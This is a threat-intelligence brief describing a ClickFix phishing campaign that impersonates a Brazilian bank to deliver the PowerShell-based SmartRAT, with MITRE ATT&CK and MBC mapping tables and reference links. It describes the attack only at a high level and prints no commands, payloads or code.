EXECUTIVE SUMMARY:
A malicious campaign impersonating a Brazilian bank uses an AI-generated website with a ClickFix technique to deliver the PowerShell-based SmartRAT. Threat actors use typosquatting domains and fake CAPTCHAs to pressure victims into executing harmful commands. The malware supports encrypted C2 communications, remote control capabilities, credential theft through keylogging and banking overlays, and persistence via scheduled tasks and Windows services. AI-generated webpages include anti-inspection measures designed to hinder analysis by disabling common keyboard shortcuts and clearing console logs. A flaw in the AI-generated C2 panel allows bypassing authentication, posing a significant threat to financial institutions.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
A malicious campaign impersonating a Brazilian bank uses an AI-generated website with a ClickFix technique to deliver the PowerShell-based SmartRAT. Threat actors use typosquatting domains and fake CAPTCHAs to pressure victims into executing harmful commands. The malware supports encrypted C2 communications, remote control capabilities, credential theft through keylogging and banking overlays, and persistence via scheduled tasks and Windows services. AI-generated webpages include anti-inspection measures designed to hinder analysis by disabling common keyboard shortcuts and clearing console logs. A flaw in the AI-generated C2 panel allows bypassing authentication, posing a significant threat to financial institutions.[emaillocker id="1283"]
The campaign leverages AI-powered website creation tools to generate convincing lures at scale, enabling rapid deployment of malicious content. The ClickFix technique combines a fake CAPTCHA with a fullscreen fake BSOD (system recovery prompt) to trick users into executing PowerShell commands that download and execute the SmartRAT. This malware family is designed for remote access and financial data theft, including intercepting sensitive information like banking credentials through QR code interception.
The use of AI-generated content in phishing campaigns represents a growing threat vector with significant implications for cybersecurity defenses. The ability to create lures quickly at scale highlights the evolving tactics used by threat actors. While technical details such as encrypted C2 communications and remote control capabilities are critical, the broader significance lies in the need for organizations to strengthen defenses against AI-generated phishing campaigns through enhanced user awareness training and improved detection mechanisms.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1543.003 | Create or Modify System Process | Windows Service |
| Defence Evasion | T1036.005 | Masquerading | Match Legitimate Resource Name or Location |
| Credential access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Command and control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Command & Control | B0030 | C2 Communication |
| Impact | B0022 | Remote Access |
| Discovery | E1083 | File and Directory Discovery |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Execution | E1204 | User Execution |
| Command & Control | E1105 | Ingress Tool Transfer |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-abuse-powershell-commands/
https://www.zscaler.com/blogs/security-research/clickfix-campaign-generated-ai-delivers-smartrat
[/emaillocker]